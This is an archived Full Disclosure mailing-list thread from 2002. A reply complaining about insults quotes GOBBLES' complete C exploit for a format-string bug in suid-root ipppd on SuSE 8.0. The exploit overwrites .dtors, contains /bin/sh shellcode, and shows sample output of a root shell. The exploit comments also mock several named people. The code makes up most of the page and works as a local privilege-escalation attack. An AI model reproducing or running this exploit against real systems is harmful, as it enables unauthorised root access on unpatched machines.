Full Disclosure mailing list archives
Local Root Exploit
From: full-disclosure () lists netsys com (ATD)
Date: 10 Aug 2002 02:17:02 -0400
--=-3cKk5y2j+jE61ubCgLMp Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Gobbles,=20 Tell me, is it common practice for "security professionals" to act like children? Or, is it common practice to commit slander? I think the majority of the people on these lists would like to see the lists used for security research and information disclosure. I do not think that the true professionals want to be bothered with childish ranting and raving. Anyway, I am sure your research is appreciated, good job on the find. Sincerely,=20 ATD =09 On Fri, 2002-08-09 at 18:54, gobbles () hushmail com wrote:
=20 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 =20 /* * GOBBLES-own-ipppd.c -- local root on SuSE 8.0 * * Random Defcon Quote: * "Who hired Gary Coleman to play KF at defcon?" * -Anonymous * * ipppd is part of the isdn4linux-utils package and * is part of the default install of many linux dists. * * It is installed suid root on suse 8.0 but can only * be run by users in group "dialout". Luckily this * is a default group that normal users get added to. * * Problem: * * Classical syslog(3) formatstring problem. * * ipppd will log device strings in the following manner: * * main.c: * * ... * syslog(LOG_NOTICE,devstr); // HARD TO SPOT BUG * ... * * This code is normally only reached with a valid device string * but if you feed ipppd a devicename that is >=3D 256 bytes it * will merrily proceed to log this string using the faulty * syslog(3) call. Subsequently handing over root access to the machine. * * GENERIC FORMATSTRING EXPLOITS ARE SUPER DUPER FUN * * We're surprised that format bugs are allowed in 7350linux, but no one * is perfect. Finding format bugs is a difficult task, and should be le=
ft
* to the professionals. A little known fact -- Paul Vixie invented * insecure programming. We wanted to get this bug squashed before some * "researcher" from snosoft.com discovered it and tried to make some mon=
ey
* off it. Help us in our mission to eliminate the existance of format b=
ugs
* in code. * * Greets: * -Mark Litchfield, for helping make defcon happen. Thanks. * -Blue Boar, for his brilliant input during the Defcon Ethics Roundtab=
le
* Challenge (the finest moment of defcon X) * -Dean Turner, who contrary to whatever might be said, GOBBLES is not * afraid of. http://www.infonexus.com/PIX/08.01.02--defcon10/46.jpg * -Eric Hines of f8labs.com, congradulations on your promotion to stock=
boy
* at Circuit City. * -dice, for continuing to support the blackhat world (thanks for buyin=
g
* a turkey breakfast) * -stealth, for making fun of the super bug. * -Brian McWilliams, for thinking he knows what's up. Hoser. * * Be careful using the Compaq TestDrive Servers -- researchers from SnoS=
oft
* have comprimised each and every one of those machines, and are rapidly * stealing other warez developed on these machines. If you have also * worked with your perl -e techniques on these machines, and discovered =
some
* locally exploitable stack overflows, your work may have been ripped of=
f.
* KF, the defcon stage, much like information security, is not for you. * * Please, help liberate dvdman! Let him go back to maintaining * l33tsecurity.com, and stop raping his mind for less-than-minimum wage; * skill displayed on l33tsecurity.com shows this man knows what's up and * deserves to make a little more money, or return to the wild where he * can hack freely. FREE DVDMAN!@#!@# * * (flashn has asked that the "hack.se is a bunch of nazis" statement fro=
m
* the defcon speech to be publically retracted and for an apology to be * issued) * */ /* * PROOF OF CONCEPT ON DEFAULT SuSE 8.0 INSTALL: * * $ ./GOBBLES-own-ipppd -t 0x806c864 * [*] target @ 0x806c868 * [*] shellcode @ 0xbfffffb5 * sh-2.05# id * uid=3D0(root) gid=3D100(users) groups=3D100(users) * sh-2.05# * */ =20 #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> =20 #define DPA 11 #define ALLIGN 3 =20 #define IPPPD "/usr/sbin/ipppd" #define OBJDUMP "/usr/bin/objdump" =20 void buildstring(unsigned long t, unsigned long w, int dpa, int allign); void stuff(void); =20 extern char **environ; char string[260]; =20 int main(int argc, char **argv) { int dpa, aln, shift =3D 0; char opt, *tmp; unsigned long t, w; =20 if(argc =3D=3D 1) { fprintf(stderr, "\nUsage: \n%s -t <.dtors address>\n\n" "Optional:\n\t-o <word offset>\n\t-a <allignment>\n\n" "For the lazy:\n\t-g spits out .dtors section (use standalone)\n\n" , argv[0]); exit(0); } =20 aln =3D ALLIGN; dpa =3D DPA; =20 while((opt =3D getopt(argc, argv, "t:o:a:g")) !=3D EOF) { switch(opt) { case 't': sscanf(optarg, "%p", &tmp); t =3D (long)tmp; t +=3D 4; break; case 'a': aln =3D atoi(optarg); break; case 'o': dpa =3D atoi(optarg); break; case 'g': fprintf(stderr, "[*] requested objdump, this will halt any exploitati=
on\n");
if(execl(OBJDUMP, "objdump", "-s", "-j", ".dtors", IPPPD, NULL)) { fprintf(stderr, "[*] error getting .dtors section, check paths\n"); exit(1); } default: fprintf(stderr, "hehehe ;PppPPPpP\n"); exit(0); } } =20 tmp =3D NULL; =20 if((tmp =3D getenv("GOBBLES")) =3D=3D NULL) { stuff(); if(execve(argv[0], argv, environ)) { fprintf(stderr, "[*] error re-executing\n"); exit(1); } } =20 w =3D (long)tmp; shift =3D (strlen(argv[0]) - strlen(IPPPD)); w +=3D shift; =20 fprintf(stderr, "[*] target @ %p\n[*] shellcode @ %p\n", t, w); =20 buildstring(t, w, dpa, aln); =20 if(execl(IPPPD, "ipppd", string, NULL)) { fprintf(stderr, "[*] error executing\n"); exit(1); } } =20 =20 void buildstring(unsigned long t, unsigned long w, int dpa, int aln) { char a_buf[4]; unsigned int un, deux, x, len, b[4]; =20 memset(string, '\0', sizeof(string)); memset(a_buf, '\0', sizeof(a_buf)); =20 for(x =3D 0; x < aln && x < sizeof(a_buf); x++) a_buf[x] =3D 'x'; =20 b[0] =3D (t & 0x000000ff); b[1] =3D (t & 0x0000ff00) >> 8; b[2] =3D (t & 0x00ff0000) >> 16; b[3] =3D (t & 0xff000000) >> 24; =20 un =3D (w >> 16) & 0xffff; deux =3D w & 0xffff; =20 if(un < deux) { snprintf(string, sizeof(string)-1, "%s" "%c%c%c%c%c%c%c%c" "%%.%hdx" "%%%d$hn" "%%.%hdx" "%%%d$hn", a_buf, b[0] + 2, b[1], b[2], b[3], b[0], b[1], b[2], b[3], un - (8 + aln + 5), dpa, deux - un, dpa + 1 ); } else { snprintf(string, sizeof(string)-1, "%s" "%c%c%c%c%c%c%c%c" "%%.%hdx" "%%%d$hn" "%%.%hdx" "%%%d$hn", a_buf, b[0], b[1], b[2], b[3], b[0]+2, b[1], b[2], b[3], deux - (8 + aln + 5), dpa, un - deux, dpa + 1 ); } =20 len =3D strlen(string); memset(&string[len], 'x', (sizeof(string)-len-1)); } =20 =20 void stuff(void) { char code[] =3D // the setuid 0 with the execve of the /bin/sh "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31" "\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d" "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; // In honor of Snosoft // appreciate week, we // too are using only // Taeho Oh shellcode. setenv("GOBBLES", code, 1); } =20 =20 -----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com =20 wlwEARECABwFAj1UR9YVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPvNQA oJ7ykXhxLAFI3diDIkN2RE/XfEdtAKC4hElIDesQgJZ6cQgZ/M6Qi4kiQQ=3D=3D =3DXIYS -----END PGP SIGNATURE----- =20 _______________________________________________ Full-Disclosure - We believe in it. Full-Disclosure () lists netsys com http://lists.netsys.com/mailman/listinfo/full-disclosure =20
--=20 -ATD- That file you've been guarding, isn't. ------------------------------------------------------------------- Secure Network Operations, Inc | http://www.snosoft.com Cerebrum Project | cerebrum () snosoft com Strategic Reconaissance Team | recon () snosoft com ------------------------------------------------------------------- --=-3cKk5y2j+jE61ubCgLMp Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQA9VK/eHs/COEe/P4cRAi+PAJwIqcqMJr59UFQqbxAGeo5r7EyRRgCeJHLX IJ37JwliANcR04uN75CfI9Q= =GvZK -----END PGP SIGNATURE----- --=-3cKk5y2j+jE61ubCgLMp--
Current thread:
- Local Root Exploit full-disclosure () lists netsys com (Aug 09)
- Local Root Exploit ATD (Aug 09)
- Local Root Exploit John (Aug 09)
- Local Root Exploit Lupe Christoph (Aug 10)
- Local Root Exploit KF (Aug 10)
- Local Root Exploit Steve (Aug 12)
- Local Root Exploit John (Aug 09)
- Local Root Exploit ATD (Aug 09)
- Local Root Exploit Roman Drahtmueller (Aug 10)
- <Possible follow-ups>
- Local Root Exploit Schmehl, Paul L (Aug 10)
- Local Root Exploit Alan Rouse (Aug 12)
- Local Root Exploit Ulf H{rnhammar (Aug 13)
- Local Root Exploit Alan Rouse (Aug 14)
- Local Root Exploit Nicolas Couture (Aug 14)